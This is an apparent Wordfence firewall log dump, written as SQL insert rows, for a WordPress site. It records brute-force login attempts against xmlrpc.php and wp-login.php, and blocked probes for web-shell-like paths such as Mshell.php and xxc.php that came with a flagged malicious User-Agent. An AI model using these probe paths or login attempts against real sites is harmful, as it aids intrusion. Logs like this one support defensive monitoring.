(51145, 0.000000, 1712319322.961804, '\0\0\0\0\0\0\0\0\0\0ÿÿ48', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51146, 0.000000, 1712319329.263576, '\0\0\0\0\0\0\0\0\0\0ÿÿnëÙ€', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51147, 0.000000, 1712319350.045165, '\0\0\0\0\0\0\0\0\0\0ÿÿgèe¶', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51148, 0.000000, 1712319351.615561, '\0\0\0\0\0\0\0\0\0\0ÿÿÊF%2', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51149, 0.000000, 1712319353.332058, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶¸H', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51150, 0.000000, 1712319354.640378, '\0\0\0\0\0\0\0\0\0\0ÿÿzªï', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51151, 0.000000, 1712319354.967128, '\0\0\0\0\0\0\0\0\0\0ÿÿTl„2', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51152, 0.000000, 1712319365.136638, '\0\0\0\0\0\0\0\0\0\0ÿÿg6³Z', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51153, 0.000000, 1712319366.507190, '\0\0\0\0\0\0\0\0\0\0ÿÿ1‘É|', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51154, 0.000000, 1712319369.128317, '\0\0\0\0\0\0\0\0\0\0ÿÿWtµö', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51155, 0.000000, 1712319383.086527, '\0\0\0\0\0\0\0\0\0\0ÿÿÅçú', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51156, 0.000000, 1712319386.352479, '\0\0\0\0\0\0\0\0\0\0ÿÿµ¿ªÉ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51157, 0.000000, 1712319390.905634, '\0\0\0\0\0\0\0\0\0\0ÿÿÐ:cM', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51158, 0.000000, 1712319392.064504, '\0\0\0\0\0\0\0\0\0\0ÿÿ1$Ô	', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51159, 0.000000, 1712319398.829111, '\0\0\0\0\0\0\0\0\0\0ÿÿuØxÖ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51160, 0.000000, 1712319400.244338, '\0\0\0\0\0\0\0\0\0\0ÿÿn&ÿh', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51161, 0.000000, 1712319403.192174, '\0\0\0\0\0\0\0\0\0\0ÿÿs`|', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51162, 0.000000, 1712319413.490808, '\0\0\0\0\0\0\0\0\0\0ÿÿ¿,ÅE', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51163, 0.000000, 1712319419.407840, '\0\0\0\0\0\0\0\0\0\0ÿÿßë…b', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51164, 0.000000, 1712319423.671545, '\0\0\0\0\0\0\0\0\0\0ÿÿVaUe', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51165, 0.000000, 1712319430.238624, '\0\0\0\0\0\0\0\0\0\0ÿÿz¢út', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51166, 0.000000, 1712319433.754930, '\0\0\0\0\0\0\0\0\0\0ÿÿˆž\Z,', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51167, 0.000000, 1712319434.746175, '\0\0\0\0\0\0\0\0\0\0ÿÿgÿ‘F', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51168, 0.000000, 1712319447.924985, '\0\0\0\0\0\0\0\0\0\0ÿÿxŠlG', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51169, 0.000000, 1712319449.616484, '\0\0\0\0\0\0\0\0\0\0ÿÿ«<ê', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51013, 1712231005.141306, 1712231004.489000, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;»', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/apikey/apikey.php.suspected?test=hello', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocC5zdXNwZWN0ZWQ=","category":"brute-force","ssl":1}'),
(51004, 1712207943.407882, 1712207942.685200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/updates.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZGF0ZXMucGhw","category":"brute-force","ssl":1}'),
(51003, 1712207961.421933, 1712207960.860700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/radio.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JhZGlvLnBocA==","category":"brute-force","ssl":1}'),
(51014, 0.000000, 1712237156.975433, '\0\0\0\0\0\0\0\0\0\0ÿÿ¥2¼', 0, 503, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51015, 1712284873.536124, 1712284873.131000, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-admin/css/index.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWFkbWluL2Nzcy9pbmRleC5waHA=","category":"brute-force","ssl":1}'),
(51016, 1712284871.709618, 1712284871.330500, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-includes/themes.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWluY2x1ZGVzL3RoZW1lcy5waHA=","category":"brute-force","ssl":1}'),
(51046, 1712316553.899182, 1712316553.554700, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/RxRjcmwy.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvUnhSamNtd3kucGhw","category":"brute-force","ssl":1}'),
(51019, 1712288986.556594, 1712288986.215400, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wb.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3diLnBocA==","category":"brute-force","ssl":1}'),
(51017, 1712283985.161607, 1712283984.772600, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/Mshell.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L01zaGVsbC5waHA=","category":"brute-force","ssl":1}'),
(51018, 1712288988.068608, 1712288987.764600, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/xxc.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3h4Yy5waHA=","category":"brute-force","ssl":1}'),
(51041, 1712310103.696062, 1712310103.385500, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/atomlib.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2F0b21saWIucGhw","category":"brute-force","ssl":1}'),
(51043, 0.000000, 1712311487.886520, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51044, 0.000000, 1712313616.150310, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51045, 0.000000, 1712315754.281517, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51042, 0.000000, 1712310630.054453, '\0\0\0\0\0\0\0\0\0\0ÿÿeã', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51322, 0.000000, 1712320114.731272, '\0\0\0\0\0\0\0\0\0\0ÿÿj×XÖ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51323, 0.000000, 1712320116.089887, '\0\0\0\0\0\0\0\0\0\0ÿÿÔºQR', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51049, 1712316548.013877, 1712316547.602300, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvaW5kZXgucGhw","category":"brute-force","ssl":1}'),
(51295, 0.000000, 1712320007.733237, '\0\0\0\0\0\0\0\0\0\0ÿÿ,¥0', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51296, 0.000000, 1712320009.275668, '\0\0\0\0\0\0\0\0\0\0ÿÿm²Ôä', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51297, 0.000000, 1712320011.471602, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹³º', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51298, 0.000000, 1712320011.535985, '\0\0\0\0\0\0\0\0\0\0ÿÿ»úÊ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51299, 0.000000, 1712320018.169356, '\0\0\0\0\0\0\0\0\0\0ÿÿgpÊ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51300, 0.000000, 1712320018.658040, '\0\0\0\0\0\0\0\0\0\0ÿÿ–kç5', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51301, 0.000000, 1712320019.840372, '\0\0\0\0\0\0\0\0\0\0ÿÿÁ‰9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51302, 0.000000, 1712320020.954529, '\0\0\0\0\0\0\0\0\0\0ÿÿ–kó•', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51303, 0.000000, 1712320029.621924, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯°Cí', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51304, 0.000000, 1712320044.264716, '\0\0\0\0\0\0\0\0\0\0ÿÿ1+R', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51305, 0.000000, 1712320051.756927, '\0\0\0\0\0\0\0\0\0\0ÿÿ1$É', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51306, 0.000000, 1712320051.031924, '\0\0\0\0\0\0\0\0\0\0ÿÿ1%q¼', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51307, 0.000000, 1712320062.758565, '\0\0\0\0\0\0\0\0\0\0ÿÿaÖ¦', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51308, 0.000000, 1712320065.140064, '\0\0\0\0\0\0\0\0\0\0ÿÿ}>Î¨', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51309, 0.000000, 1712320066.251759, '\0\0\0\0\0\0\0\0\0\0ÿÿg`+~', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51310, 0.000000, 1712320066.426549, '\0\0\0\0\0\0\0\0\0\0ÿÿÅÝÿû', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51311, 0.000000, 1712320067.770724, '\0\0\0\0\0\0\0\0\0\0ÿÿ³°é', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51312, 0.000000, 1712320076.037907, '\0\0\0\0\0\0\0\0\0\0ÿÿ½½à', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51313, 0.000000, 1712320076.027531, '\0\0\0\0\0\0\0\0\0\0ÿÿz¡%Ò', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51314, 0.000000, 1712320078.545221, '\0\0\0\0\0\0\0\0\0\0ÿÿ¡7­', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51315, 0.000000, 1712320084.954462, '\0\0\0\0\0\0\0\0\0\0ÿÿz°Åþ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51316, 0.000000, 1712320084.421059, '\0\0\0\0\0\0\0\0\0\0ÿÿš æ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51317, 0.000000, 1712320096.983496, '\0\0\0\0\0\0\0\0\0\0ÿÿBbú', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
